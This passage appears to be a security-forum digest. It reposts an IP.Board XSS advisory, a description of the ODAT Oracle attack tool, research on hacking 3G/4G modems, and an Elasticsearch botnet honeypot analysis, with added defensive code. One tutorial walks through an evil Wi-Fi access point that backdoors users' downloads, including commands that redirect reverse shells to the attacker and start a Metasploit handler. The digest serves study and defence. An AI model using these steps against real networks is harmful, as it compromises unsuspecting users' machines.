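            findings.append("%s: PointerToRawData 0x%x + SizeOfRawData 0x%x exceeds file size 0x%x"
                            % (s["name"], s["raw_ptr"], s["raw_size"], len(data)))
    return findings


def pe_checksum(data):
    """CheckSum as computed by imagehlp CheckSumMappedFile: a carry-folded sum of all
    dwords except the CheckSum field, folded to 16 bits, plus the file length."""
    skip = parse_pe(data)["checksum_offset"]          # headers are dword aligned
    padded = data + b"\x00" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def checksum_ok(data):
    """True when the stored CheckSum matches the file (a stored 0 means 'not set')."""
    return parse_pe(data)["checksum"] == pe_checksum(data)


def fix_checksum(data):
    out = bytearray(data)
    struct.pack_into("<I", out, parse_pe(data)["checksum_offset"], pe_checksum(data))
    return bytes(out)


if __name__ == "__main__":
    print(check_sections(build_sample_pe(0xFFFFFFFF)))
    print(naive_in_bounds_32(0x200, 0xFFFFFFFF, 0x400))
    print(checksum_ok(fix_checksum(build_sample_pe(0x200))))
```

Windows only enforces CheckSum for drivers and a few system images, so a mismatch on an ordinary executable is evidence of patching after link time rather than an outright error; a SizeOfRawData that overruns the file, on the other hand, is never valid and should stop a scanner from reading the section.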
  9. IP.Board 4.1.4.x - Persistent XSS Vulnerability

     # Exploit Title: IP.Board Persistent XSS Vulnerability
     # Date: 29/10/2015
     # Software Link: https://www.invisionpower.com/buy
     # Software version: 4.1.4.x
     # Exploit Author: Mehdi Alouache
     # Contact: mehdi.alouache@etu.univ-lehavre.fr
     # Category: webapps

     1. Description
     Any registered user can execute remote JavaScript code by sending a private message to another user. The malicious JS code has to be written in the title of the message, and the receiver must have enabled notifications when a new message is delivered. Note that the code will be directly executed as soon as the notification appears. (The receiver doesn't even need to check his inbox.)

     2. Proof of Concept
     Register on the forum (IP.Board) of a website as a regular user, and send a message to any user having message notifications enabled. In the title field (and only here), a simple <script>alert(1)</script> will show a dialog box to the victim.

     3. Solution:
     Patch the vulnerability with the (incoming) associated patch.

     --
     ALOUACHE Mehdi
     Departement informatique
     Groupe A
     mehdi.al ouache@hotmail.fr
     mehdi.alouache@etu.univ-lehavre.fr

     Source: https://www.exploit-db.com/exploits/38837/
  10. No. If you have a regular (limited) user account on a Windows machine and this program is installed, you can use it to obtain administrator privileges. Protecting your site is hard (impossible). You can check the User-Agent and the various HTTP headers it sends, but they can probably be removed or modified. You can block after a certain number of requests per second, but the scan can be run more "slowly". You can block the IP (the one the scan comes from) after a large number of errors (e.g. 404), but these can be avoided. In short, it's simpler to have a "secure" site than to hide from web scanners.
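The three heuristics in the reply, run over constructed log lines as an added example (not the poster's code): a requests-per-second limit, a 404 burst counter, and a User-Agent marker list. The thresholds, the marker strings and the sample IPs are assumptions; the sample also contains a scanner that spaces its probes ten seconds apart and is not caught, which is the evasion the reply points out.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache/nginx "combined" format; the lines fed in below are constructed.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+ "[^"]*" "([^"]*)"$')


def parse_line(line):
    """(ip, timestamp, status, user-agent) or None for a line that does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, _request, status, ua = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), int(status), ua


def detect(lines, max_per_sec=10, max_404_per_min=20, ua_markers=("sqlmap", "nikto")):
    """{ip: sorted reasons} for every source that trips one of the three heuristics.
    Thresholds and the User-Agent markers are assumed values, not a recommendation."""
    flagged = defaultdict(set)
    recent = defaultdict(deque)     # per IP: request times inside the last second
    errors = defaultdict(deque)     # per IP: 404 times inside the last minute
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, status, ua = rec
        if any(marker in ua.lower() for marker in ua_markers):
            flagged[ip].add("user-agent")
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > timedelta(seconds=1):
            q.popleft()
        if len(q) > max_per_sec:
            flagged[ip].add("rate")
        if status == 404:
            e = errors[ip]
            e.append(ts)
            while ts - e[0] > timedelta(minutes=1):
                e.popleft()
            if len(e) > max_404_per_min:
                flagged[ip].add("404-burst")
    return {ip: sorted(reasons) for ip, reasons in flagged.items()}


def _line(ip, t, path, status, ua):
    return (f'{ip} - - [{t.strftime("%d/%b/%Y:%H:%M:%S")} +0000] '
            f'"GET {path} HTTP/1.1" {status} 512 "-" "{ua}"')


# Constructed sample log. T0 is only used for formatting; parsing adds the +0000 zone.
T0 = datetime(2015, 12, 3, 10, 0, 0)
SAMPLE = []
# fast scanner: 30 probes inside one second, 25 of them 404s
SAMPLE += [_line("10.0.0.1", T0, f"/admin{i}.php", 404 if i < 25 else 200, "Mozilla/5.0")
           for i in range(30)]
# slow scanner: the same probes ten seconds apart, browser-like User-Agent
SAMPLE += [_line("10.0.0.2", T0 + timedelta(seconds=10 * i), f"/admin{i}.php",
                 404 if i < 25 else 200, "Mozilla/5.0") for i in range(30)]
# tool that left its default User-Agent in place
SAMPLE += [_line("10.0.0.3", T0 + timedelta(seconds=i), "/index.php?id=1", 200,
                 "sqlmap/1.0-dev (http://sqlmap.org)") for i in range(3)]
# ordinary visitor
SAMPLE += [_line("10.0.0.4", T0 + timedelta(seconds=i), "/", 200, "Mozilla/5.0")
           for i in range(3)]

if __name__ == "__main__":
    for ip, reasons in detect(SAMPLE).items():
        print(ip, reasons)
```

10.0.0.2 sends exactly the same probes as 10.0.0.1 and never appears in the output: spread over five minutes it stays under both the per-second and the per-minute windows, which is why the reply concludes that fixing the site beats trying to fingerprint the scanner.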
  11. http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf
  12. Oracle Database Attacking Tool

     ODAT linux standalone version at https://github.com/quentinhardy/odat-standalones

     ODAT
     ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.

     Usage examples of ODAT:
     - You have an Oracle database listening remotely and want to find valid SIDs and credentials in order to connect to the database
     - You have a valid Oracle account on a database and want to escalate your privileges (ex: SYSDBA)
     - You have a valid Oracle account and want to execute commands on the operating system hosting this DB (ex: reverse shell)

     Tested on Oracle Database 10g, 11g and 12c (12.1.0.2.0).

     Features
     Thanks to ODAT, you can:
     - search valid SID on a remote Oracle Database listener via:
       - a dictionary attack
       - a brute force attack
       - ALIAS of the listener
     - search Oracle accounts using:
       - a dictionary attack
       - each Oracle user like the password (need an account before to use this attack)
     - execute system commands on the database server using:
       - DBMS_SCHEDULER
       - JAVA
       - external tables
       - oradbg
     - download files stored on the database server using:
       - UTL_FILE
       - external tables
       - CTXSYS
       - DBMS_LOB (NEW : 2014/07/28)
     - upload files on the database server using:
       - UTL_FILE
       - DBMS_XSLPROCESSOR
       - DBMS_ADVISOR
     - delete files using:
       - UTL_FILE
     - send/receive HTTP requests from the database server using:
       - UTL_HTTP
       - HttpUriType
     - scan ports of the local server or a remote server using:
       - UTL_HTTP
       - HttpUriType
       - UTL_TCP
     - capture a SMB authentication through:
       - an index in order to trigger a SMB connection
     - exploit CVE-2012-3137 (The authentication protocol in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 all):
       - pick up the session key and salt for arbitrary users
       - attack by dictionary on sessions
     - check CVE-2012-1675 (http://seclists.org/fulldisclosure/2012/Apr/204)
     - search in column names thanks to the search module (NEW : 2015/03/17):
       - search a pattern (ex: password) in column names
     - unwrap PL/SQL source code (10g/11g and 12c)

     Source: https://github.com/quentinhardy/odat
  13. Critical Vulnerabilities in 3G/4G Modems or how to build Big Brother

     This report is the continuation of "#root via SMS", a research made by the SCADA Strangelove team in 2014. It was devoted to telecommunications equipment vulnerabilities with modem flaws only partially covered. This document describes vulnerabilities found and exploited in eight popular 3G and 4G modems available in Russia and worldwide. The findings include Remote Code Execution (RCE) in web scripts, integrity attacks, Cross-Site Request Forgery (CSRF), and Cross-Site Scripting (XSS).

     The research covers a full range of attacks against carrier customers using these types of modems: device identification, code injection, PC infection, SIM card cloning, data interception, determining subscriber location, getting access to user accounts on the operator's website, and APT attacks.

     Equipment
     We analyzed eight modems of the following vendors:
     - Huawei (two different modems and a router)
     - Gemtek (a modem and a router)
     - Quanta (two modems)
     - ZTE (one modem)
     Not all the modems had vulnerabilities in their factory settings; some of them appeared after the firmware was customized by the service provider. For convenience, let's call all the network equipment (both modems and routers) collectively "modems".

     Statistics on Vulnerable Modems
     The data was gathered passively from SecurityLab.ru between 01/29/2015 and 02/05/2015 (one week). Our statistics lack information about Huawei modems, but it can be easily found at shodan.io:

     Vulnerabilities Detected
     All the modem models investigated had critical vulnerabilities leading to complete system compromise. Virtually all the vulnerabilities could be exploited remotely (see the "Modems" table). Description of the detected vulnerabilities ranked by severity:

     1. RCE (five devices)
     All the modem web servers are based on simple CGI scripts that are not properly filtered (except for Huawei modems, and even then only after a few security updates since the vulnerabilities have been disclosed). All the modems work with the file system: they need to send AT commands, read and write SMS messages, configure firewall rules, etc. Almost no devices had CSRF protection, which allowed remote code execution by power of social engineering and remote requests through a malicious website. Some modems were also vulnerable to XSS attacks. Combined, these three factors produce a disappointing result: more than 60% of the modems are vulnerable to Remote Code Execution. You could get an updated firmware without all found vulns for only Huawei modems (there's a public description of the vulnerabilities). The other vulnerabilities are still considered to be zero-day.

     2. Integrity Attacks (six devices)
     Only three modems were protected against arbitrary firmware modifications. Two of them had the same integrity check algorithms (asymmetrically encrypted SHA1 with RSA digital signature), and the third one used the RC4 stream cipher for firmware encryption. All the cryptographic algorithms proved to be vulnerable to attacks violating integrity and confidentiality. In the former case, we can modify the firmware by injecting an arbitrary code. In the latter case, given the weak implementation of the algorithm, we managed to extract the encryption key and determine the encryption algorithm, which also allows firmware modification. The other three modems had no protection from integrity attacks, but local access to COM interfaces was required to update the firmware. The remaining two modems could be updated only through the carrier's network via Firmware Over-The-Air (FOTA) technology.

     3. CSRF (five devices)
     CSRF attacks can be used for various purposes, but the primary ones are remote upload of modified firmware and successful arbitrary code injection. Using unique tokens for each request is an efficient protection against this type of attacks.

     4. XSS (four devices)
     The scope of this attack is quite wide: from host infection to SMS interception. However, our research focuses mainly on its prime target: modified firmware upload bypassing AntiCSRF checks and the Same-Origin Policy.

     Attack Vectors

     1. Identification
     First, you need to identify a modem for a successful attack. You can send all kinds of requests to exploit RCE or try to upload various updates via all the possible addresses, but it seems to be inefficient and too signally for a target user. The time of infection (from user detection to code injection, modification of modem settings, etc.) is also quite important in the real (not simulated) conditions. For this very reason, you need to identify the target device properly. To do that, you must use a simple set of picture addresses, which can tell you the model of the modem. This method helped us to identify all the investigated modems 100%. An example of the code:

     2. Code Injection
     This stage is described in the previous section, points 1 and 2. The code can be injected either through RCE in web scripts, or through uploading infected firmware. The first method allowed us to penetrate five modems; it isn't that complicated. Let's describe the vectors of the second method in detail.

     Two modems used the same algorithm to protect firmware integrity: the digital signature of the SHA1 hash sum by an asymmetric RSA key was carried out via an OpenSSL library. The verification was incorrect: after uploading the firmware (an archive), the web server extracted two main files from it, the one specifying the size of the verified data and the one with the signed hash sum. Next, the verification script obtained a public key from the file system and sent a request to OpenSSL functions to decrypt the signature and compare the hash sum. If the hash sums were the same, the update was installed. The firmware compression algorithm had a feature: you could add additional files with the same names to the archive, but its first bytes wouldn't change. In addition, when we extracted the firmware, the later files overrode the earlier files. This allows changing the firmware without affecting data integrity checks.

     The firmware of the third modem was encrypted by the RC4 algorithm with a constant keystream. As there were three different firmware versions on the Internet, you could get several bytes of plain text where there were bytes 0x00 in a file of the unencrypted firmware. Then, we extracted the ISO image of the modem's virtual CDROM, which allowed us to decipher the first several kilobytes of each firmware image. They contained the encryption algorithm and the address of the encryption key. By XORing the two pieces of firmware, we obtained the plain text of the key itself. Dmitry Sklyarov, an experienced cryptanalyst and reverse engineer from Positive Technologies, helped us a lot to conduct attacks against cryptographic protocols.

     You can use CSRF for remote upload and HTML5 functions for transferring multipart/form-data, or XSS if an application is protected against CSRF (Huawei modem). Only three Huawei modems had this kind of protection, which could be bypassed via XSS, though. In all other cases, an attacker could use the HTML5 code located on a special web page (you can download an example from http://blog.kotowicz.net/2011/04/how-to-upload-arbitrary-file-contents.html). Gemtek modems required a special utility for firmware updates installed on the PC. In this case, firmware was uploaded through the host's internet connection via HTTP. After that, the firmware integrity was verified by checksums uploaded from the server. We failed to test this scenario. However, it's no use hoping that a vendor that doesn't properly check firmware integrity during upload protects it well enough.

     3. Data Interception
     Now we can execute arbitrary code on the modem. You need to do three things: determine the modem's location (later you will understand why) plus be able to intercept SMS messages and HTTP/HTTPS traffic. The easiest way to determine location is to find the base station identifier (CellID). Then, with the operator's MCC and MNC at hand, you can determine the victim's exact location by means of some public bases, such as opencellid.org. Another method is to use the modem's Wi-Fi card to scan nearby networks and determine the victim's location area more accurately, given that one base station may have quite a broad coverage. We managed to obtain the CellID of six modems; Wi-Fi was available in two devices. We had to recompile and upload new network card drivers for one of the modems. Its previous driver allowed only the Ad Hoc mode, which prevents scanning nearby APs.

     We studied two types of modems: with and without SMS support. The first type also didn't allow SMS reading through AT commands. The second type allowed SMS reading via XSS. The messages are usually stored in the file system, and it's not so difficult to get access to them for reading or sending SMS messages and USSD requests.

     Traffic interception is more interesting. There are several ways to do that: by changing the modem's DNS server settings, or replacing the modem's gateway with the Wi-Fi interface and connecting to a hacker's access point (that's why you should know the victim's location). The first method is simpler: changing the settings is a piece of cake, as they are also stored in the file system. We managed to do that for all but one modem. We studied the second method only in theory: switching the network card mode from ad hoc to active, connecting to an access point, and changing modem routing. Not only HTTP traffic can be intercepted.
By injecting and executing a VBS code on an HTML page, you can add your certificate to the Trusted Root Certification Authorities and successfully conduct MITM attacks: 4. SIM Card Cloning and 2G Traffic Interception The attacks against SIM card applications were described in detail by Karsten Nohl and in the “#root via SMS” research. We still have to send binary SMS messages to SIM cards, as we failed to make modems send commands to SIM card applications via APDU. It’s not that bad, though — by injecting an arbitrary code to a modem, you can extend the attack scope by means of binary SMS messages. Firstly, you can now send these messages “to yourself” from the target SIM card via the AT interface by switching the modem to the test mode and working with the COM port. You can do that in the background —the web interface will be available to the victim, who will hardly notice mode changeover. Secondly, you need to exchange data with the COM port via injecting a VBS code to the modem page and executing it with user rights with the help of social engineering. Switching the modem to the test mode The PowerShell script for sending a binary SMS message Using FakeBTS is the next attack vector, and you also need to know the victim’s location for it. Having the victim’s exact location and IMSI at hand, we can use a fake base station nearby and wait until the subscriber connects to us, or we can force a base station (it is possible for five devices). If the operation is successful, we will be able to send binary SMS messages to the target SIM card without any restrictions from the operator. 5. PC Infection If we penetrate a modem, we have very few attack vectors. However, infecting a PC connected to the modem provides us with many ways to steal and intercept the PC user's data. You may have already heard of the main infection vector — bad USB. There are also some other methods involving social engineering: Virtual CDROM. 
Almost all the modems have a virtual drive image that is enabled for driver installation. You need to replace the image and force its mounting. VBS, drive-by-download. Code injection to an HTML page, or forced upload of executable files as updates or “diag utilities”. Browser 0-days. As an example, we used Adobe Flash 0-day found in the archives of Hacking Team. Vulnerable client software. One of the operators delivered vulnerable diagnostic software together with its modems, which allowed executing an arbitrary code on Windows and OS X PCs. Reference: we'd like to give a special thanks to Mikhail Firstov from Headlight Security for detecting this vulnerability. Random Code Execution in the client software of a modem 6. APT Attacks After infecting the modem and host, you need to stay in the systems somehow — save changes in the modem's even after it is switched off and prevent further firmware updates. It would be useful to detect and infect other vulnerable modems as soon as they will be connected to the PC. Most of the devices can be infected right at the phone store during "checking before buying". There was another attack we failed to conduct — accessing the modem from the operator's network. Most vulnerable web servers listen at *:80, i.e. there's a chance that the modem's web server will be available from the operator's network. Only a few modems restrict connections incoming from the telecom's network or specify the address for listen 192.168.0.1:80. 7. Additional Information We also studied getting access to a personal account by sending a USSD request and resetting password via an SMS message. This vector was demonstrated during the "#root via SMS" presentation. The vulnerability was exploited through an XSS attack that could be conducted by sending an SMS message. However, an attacker can also do that in modems that allow SMS reading via RCE. XSS exploitation results Summary All in all, we have a full infection cycle of devices and related PCs. 
Using the infected devices, we can determine location, intercept and send SMS messages and USSD requests, read HTTP and HTTPS traffic (by replacing SSL certificates), attack SIM cards via binary SMS messages, and intercept 2G traffic. Further infection can continue through the operator's networks, popular websites or equipment infected by worms (when connecting a new device). What can we recommend to those clients who constantly work with such devices? Huawei modems with the latest firmware updates are the most protected. It is the only company that delivers firmware (the operators are only allowed to add some visual elements and enable/disable certain functions) and fixes vulnerabilities detected in its software. ? Modems Information Disclosure Although 90 days had left since the service providers were informed of the vulnerabilities, many flaws remained unfixed. Credits: Alexey Osipov, Dmitry Sklyarov, Kirill Nesterov, Mikhail Firstov, and the SCADA Strangelove team (http://scadasl.org) Author: Positive Research ?? 6:10 AM Sursa: http://blog.ptsecurity.com/2015/12/critical-vulnerabilities-in-3g4g-modems.html
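The archive-overwrite bypass described under Code Injection comes down to two verifier mistakes: the signature covers only the number of bytes the archive itself declares, and extraction lets a later entry override an earlier one with the same name. The following is an added example, not code from the Positive Technologies research; it uses a toy archive format and an HMAC as a stand-in for the RSA-signed SHA1 (both assumptions) to contrast the flawed check with one that signs the whole image and refuses duplicate names.

```python
import hashlib
import hmac
import struct

# Constructed demo key: stands in for the vendor's RSA key pair (assumption;
# HMAC-SHA256 replaces the RSA-signed SHA1 of the real firmware).
VENDOR_KEY = b"demo-vendor-signing-key"


def pack_entries(entries):
    """Serialize (name, data) pairs into the toy archive body."""
    body = b""
    for name, data in entries:
        name_b = name.encode()
        body += struct.pack(">I", len(name_b)) + name_b
        body += struct.pack(">I", len(data)) + data
    return body


def parse_entries(body):
    """Parse the toy archive body back into (name, data) pairs."""
    entries, off = [], 0
    while off + 4 <= len(body):
        (nlen,) = struct.unpack_from(">I", body, off)
        off += 4
        name = body[off:off + nlen].decode()
        off += nlen
        (dlen,) = struct.unpack_from(">I", body, off)
        off += 4
        entries.append((name, body[off:off + dlen]))
        off += dlen
    return entries


def sign(data):
    return hmac.new(VENDOR_KEY, data, hashlib.sha256).digest()


def build_signed_image():
    """Vendor side: the body, the declared verified size, and the signature."""
    body = pack_entries([("kernel.bin", b"K" * 16), ("rootfs.img", b"R" * 32)])
    return body, len(body), sign(body)


def extract_last_wins(body):
    """Model the modem's extractor: later entries override earlier ones."""
    files = {}
    for name, data in parse_entries(body):
        files[name] = data
    return files


def verify_flawed(body, declared_size, signature):
    """Checks only the prefix whose length the archive itself declares."""
    return hmac.compare_digest(sign(body[:declared_size]), signature)


def verify_hardened(body, signature):
    """Sign the whole image and refuse archives with duplicate entry names."""
    if not hmac.compare_digest(sign(body), signature):
        return False
    names = [name for name, _ in parse_entries(body)]
    return len(names) == len(set(names))


def append_entry(body, name, data):
    """Append one more entry after the signed region (test helper)."""
    return body + pack_entries([(name, data)])
```

With the flawed check, an image that has a second `rootfs.img` appended after the declared size still verifies, and the last-wins extractor installs the appended copy; the hardened check rejects it on both counts.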
14. EVIL ACCESS POINT WITH AUTO-BACKDOORING FTW!

This post is about setting up an evil access point that will automatically backdoor executables that connected users download. Pretty neat, right? This tutorial is inspired by muts' NetHunter video of BDFProxy on NetHunter. I am using Kali NetHunter 2.0 running from a Nexus 9. I am using a TP-LINK TL-WN722N (the 150Mbps version) as my secondary network interface.

I recently purchased a Nexus 9 tablet and decided to load it up with Kali NetHunter. NetHunter is a release of Kali made specifically for hackers on-the-go. It's packed with lots of cool stuff like one-click scripts, HID Keyboard attack capabilities plus a bunch of the tools that Kali desktop comes with.

Tools

A few tools I will be using:

Mana – Rogue Access Point toolkit. It implements a more advanced version of the Karma attack. The most notable improvement is that Mana responds to other AP broadcasts instead of device probes like Karma, but still with the end goal of tricking victims into connecting to the AP you own. Plus, it includes lots of other neat evil AP tricks that are baked right in. For more info on Mana I'd recommend watching the Defcon 22 talk where the tool was released here.

BackdoorFactory BDFProxy – Automatically patches binaries with malicious payloads on the fly via MITM.

False Start

Since I want to also provide victims with Internet access so I can backdoor their downloads I will need another Wi-Fi interface on my Nexus 9. I ended up going with the TP-LINK TL-WN722N because of its low power usage and its compatibility with Kali (supports packet injection). I launched the Kali NetHunter menu and saw a promising looking menu item: Kali NetHunter comes with Mana already installed and ready to go, or so I thought. Chances are I was doing something wrong, but I was not able to get the built-in one-click launcher working out of the box. It even contained a screen for bdfproxy.cfg! When I started it there was even the option to start with bdf: But no dice. Even after correcting my upstream device from eth0 to wlan1 and double checking the dhcpd settings in the config file I couldn't get the thing to run. I couldn't seem to find the output of either Mana or BDFProxy in the logs either.

Setting Up

So, off to the terminal! Home sweet home. I went into the Mana folder and skulked around a little bit:

cd /usr/share/mana-toolkit/run-mana
ls -lah

Aha! The start-nat-simple-bdf-lollipop.sh looks promising. Let's have a look: Everything looks pretty straightforward actually, which was pleasantly surprising. I never know what to expect with new tools. We assign some variables for devices, enable forwarding, start an access point and DHCP, monkey with the iptables and off we go. The only thing that stumped me at first was the "# Add fking rule to table 1006". There are some config files mentioned in there. Let's make sure they are set up properly.

First stop is /etc/mana-toolkit/hostapd-karma.conf: Next let's look at /etc/mana-toolkit/dhcpd.conf: Looks like we're using Google for DNS and putting our clients on the 10.0.0.0/24 range. Cool beans.

Let's also take a look at the BDFProxy config file at /etc/bdfproxy/bdfproxy.cfg (config file below truncated to the important parts): Looks like there is something slightly off here. The IPs configured for our reverse shells (192.168.1.168 and 192.168.1.16) need to point back to us. According to the dhcpd.conf settings we're going to use, the current settings aren't correct. We will be the router IP named in dhcpd.conf, so we need to change bdfproxy.cfg accordingly by setting all the HOSTs to point to us at 10.0.0.1. Quick replace with sed:

sed -i 's/192.168.1.168/10.0.0.1/g' bdfproxy.cfg
sed -i 's/192.168.1.16/10.0.0.1/g' bdfproxy.cfg

The diffs:

Starting up the Machine

Ok, so it's time to start Mana up:

cd /usr/share/mana-toolkit/run-mana
./start-nat-simple-bdf-lollipop.sh

In a new terminal we start BDFProxy up:

cd /etc/bdfproxy/
./bdfproxy

Now that BDFProxy is up it has created a Metasploit resource file. It wasn't entirely obvious at first where this file lived (it is not in /etc/bdfproxy/). It turns out the file is here: /usr/share/bdfproxy/bdfproxy_msf_resource.rc. That resource file will help handle reverse shells. Time to open another terminal, navigate there and start up Metasploit:

cd /usr/share/bdfproxy
service postgresql start
cat bdfproxy_msf_resource.rc   # sanity check of contents, make sure IP update took
msfconsole -r bdfproxy_msf_resource.rc

After Metasploit is fired up we can see the resource file has loaded: Sweetness.

Here is where I got stuck for a little bit. It appeared everything is set up and working properly. Mana was creating APs and I could connect and get back out to the internet. The iptables rules set up by Mana are correctly forwarding my traffic from port 80 to 8080 where BDFProxy is waiting. The problem is BDFProxy is failing to transparently proxy connections (mitmproxy underneath is actually failing). I got this error on all HTTP connections from my laptop test machine connected to the evil AP:

HttpError('Invalid HTTP request form (expected: absolute, got: relative)',)

It turns out I missed changing one of the default bdfproxy.cfg settings. The line

transparentProxy = None

needs to be changed to:

transparentProxy = transparent

After that BDFProxy was able to successfully backdoor executables. I connected to the AP with my laptop and downloaded a file over http. I downloaded Audacity, and also tested with downloading Putty and PSFTP. Once BDFProxy gets its hooks in the backdoor is dropped in place: Here is the part that blew me away: executables within zips are backdoored, all done on the fly. How cool is that? For executable formats it not only works for Windows exe/PEs, but it does Linux ELF and Mach-O (that means you OSX!). Very cool stuff.

- UPDATE 11/29/15: I've added some more content about BDFProxy in a new post here.

19 NOVEMBER 2015

Source: http://decidedlygray.com/2015/11/19/evil-access-point-with-auto-backdooring-ftw/
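Since BDFProxy patches executables in transit, including members of zip archives, the defender's counterpart is to check what arrived against digests published out of band (or fetched over a separately authenticated channel) rather than trusting the plain-HTTP download. The following is an added example, not code from the post or from BDFProxy; it builds a constructed zip in memory, records a per-member SHA-256 manifest, and reports which members of a later copy no longer match, were added, or went missing.

```python
import hashlib
import io
import zipfile


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def make_demo_zip(files):
    """Build a zip archive in memory from {member_name: bytes} (constructed input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_manifest(zip_bytes):
    """Per-member SHA-256 digests, as a publisher would ship alongside the archive."""
    manifest = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.is_dir():
                manifest[info.filename] = sha256_hex(zf.read(info))
    return manifest


def verify_download(zip_bytes, manifest):
    """Return {member: problem} for members that differ from, are absent from,
    or are not listed in the manifest; an empty dict means the copy is intact."""
    problems = {}
    seen = set()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            seen.add(info.filename)
            expected = manifest.get(info.filename)
            if expected is None:
                problems[info.filename] = "not in manifest"
            elif sha256_hex(zf.read(info)) != expected:
                problems[info.filename] = "digest mismatch"
    for name in manifest:
        if name not in seen:
            problems[name] = "missing from archive"
    return problems


def demo():
    """Constructed publisher archive versus a received copy whose executable
    member was altered on the way; returns the verifier's findings."""
    original = {"tool/app.exe": b"MZ" + b"\x00" * 60, "tool/README.txt": b"hello"}
    manifest = build_manifest(make_demo_zip(original))
    received = dict(original)
    received["tool/app.exe"] = b"MZ" + b"\x90" * 60
    return verify_download(make_demo_zip(received), manifest)
```

The manifest only helps if it reaches the client by a path the proxy cannot rewrite, which is why publishers sign checksum files or serve them over TLS; the check itself is the same whichever way the digests arrive.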
15. The most dangerous function in the C/C++ world

03.12.2015 Andrey Karpov

After checking hundreds of various C/C++ projects I can claim: memset() is the most inefficient and dangerous function. Most errors that I see in the projects are related to the usage of this particular memset() function. I understand that my conclusion is probably neither a revolutionary one, nor an extremely useful one, but I think our readers would be interested to find out why I have come to it.

Couple of words about me

My name is Andrey Karpov. I do a lot of things in my life. But the main thing I do is tell programmers about the benefits of using static code analysis. Of course I do it pursuing an additional goal: I try to raise interest in PVS-Studio. However, this should not lessen the usefulness of my articles. The only form of advertising that can pierce through the armor of programmers' skepticism is the demonstration of the bugs that were found by PVS-Studio. For this purpose I run the analyzer on a big number of projects and write articles about the check results. This brings common benefits. Open-source projects are gradually getting better, and our company is obtaining new customers. You'll see what I'm leading to. Doing numerous checks of open-source projects, I have gathered a pretty big collection of various bug examples. And now, based on it, I see interesting error patterns. For example, one of the most amusing observations was that most often programmers make mistakes using Copy-Paste at the very end. On this topic there is an article "The Last Line Effect" for those who may be interested.

New observation

Now I have another interesting observation. Using one or another function, programmers can make mistakes. That is clear, you may say. But the probability of the error may also depend on the function. In other words, some functions provoke errors, and some don't. And now I am ready to name the function which causes most of the troubles and using which you have the biggest chance of an epic fail.

So, the biggest loser among the functions is the memset function! It's hard to say where the root of this evil is. Apparently it has an unfortunate interface. On top of it, its very usage is quite toilsome and it's very easy to get wrong when evaluating the values of the actual arguments.

The second "Biggest loser" award goes to the printf() function and its variants. I guess it's no surprise. Only lazy people won't write about the danger of the printf() function. Probably the popularity of the issues related to the printf() functions brought it to the second place.

All in all there are 9055 bugs in my storage. These are errors that PVS-Studio is able to detect. It is clear that this list is far from being a complete one. However, such a large number of bugs allows me to be confident when making such statements about the functions. So, I figured that 329 errors are caused by the memset() function. In sum total, about 3.6% of bugs are related to this function! That's a lot, I should say.

Full article: http://www.viva64.com/en/b/0360/
16. ElasticZombie Botnet - Exploiting Elasticsearch Vulnerabilities

Markus Manzke, December 2, 2015

With the rise of inexpensive Virtual Servers and popular services that install insecurely by default, coupled with some juicy vulnerabilities (read: RCE - Remote Code Execution), like CVE-2015-5377 and CVE-2015-1427, this year will be an interesting one for Elasticsearch. Elasticsearch provides plenty of targets for people to exploit and create server-based botnets, but in fairness it is not only Elasticsearch that suffers from critical vulnerabilities; there is also ShellShock, mongodb-exploits and very recently a bug that hit WebSphere, JBoss, Jenkins and OpenNMS.

This blog post analyzes what happens if you run a vulnerable service that is connected to the internet, resulting in your server becoming a compliant member of a botnet. With our analysis we concentrate on how the infection happens, what the bots are doing and whom they communicate with, but not the code itself. For a nice read on dissecting Linux-based malware we'd suggest you read the articles from @MalwareMustDie. Over a period of 3 months we collected more than 30 different bots, giving us enough interesting stuff to play with and analyze.

Exploits against ElasticZombie - Honeypots, 30 days

Setup

This past summer we rolled out some honeypots, designed to simulate Elasticsearch installations that are vulnerable to the latest RCE vulnerabilities, which enabled us to track and record each phase of an exploit and catch the malware to analyze what it does when executed. The Honeypots themselves consisted of a real Elasticsearch server, and we used nginx and lua to detect and record the exploits in GET or POST requests. This allowed us to correlate and track activities, as well as bad actors, across all of our honeypots. In the next blog post, we will provide details of the botnet infrastructure.

Within 3-4 days after setup, the first scanners hit: some Shodan scanners and vuln-crawlers from organizations and universities, but also from IPs with no PTR. A few days after setup we saw the first exploit attempts that allowed us to fine-tune our setup.

Categorizing the Bots

The Bots we collected were ELF executables, mostly 32-bit binaries that wouldn't run on a pure x64 server, but also some 64-bit versions, as opposed to the perl bots Conor Patrick caught with a ShellShock honeypot some weeks ago. Half of the 30+ bots we collected didn't run; the remaining 15 bots could be classified into 2 different categories:

fBots: Fire & Forget - DDoS bots (most of them) that just execute without further installation
iBots: more sophisticated bots which install themselves in /etc or /var, that can download more modules/bots and delete the original file

The fBots are well known and nothing new and are sometimes referred to as BillGates/BillGates.lite:

xwdl/xoxo - VT - 26 / 57
udp/syn2500 - VT - 27 / 56
ssss/508 - VT - 12 / 56

iBots, also referred to as IptabLex/IptabLes, have been around for quite some time and were well analyzed in May 2014 and again in June 2015 by MalwareMustDie.

